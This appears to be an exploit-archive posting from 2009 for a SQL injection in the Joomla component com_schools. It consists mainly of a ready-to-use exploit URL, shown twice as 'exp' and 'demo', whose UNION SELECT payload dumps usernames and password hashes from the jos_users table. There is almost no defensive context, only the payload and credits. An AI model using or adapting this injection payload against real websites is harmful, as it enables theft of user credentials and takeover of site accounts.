[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_schools SQL injection
# Published : 2009-12-24
# Author : Mr.tro0oqy
# Previous Title : Snitz Forums 2000 Database Disclosure Vulnerability
# Next Title : PBX Phone System v2.x - Multiple Vulnerabilities
Joomla Component com_schools SQL injection
author:Mr.tro0oqy
email:t.4@windowslive.com
exp:
http://server/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
demo :
http://server/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
qtaaaaaaaaf :)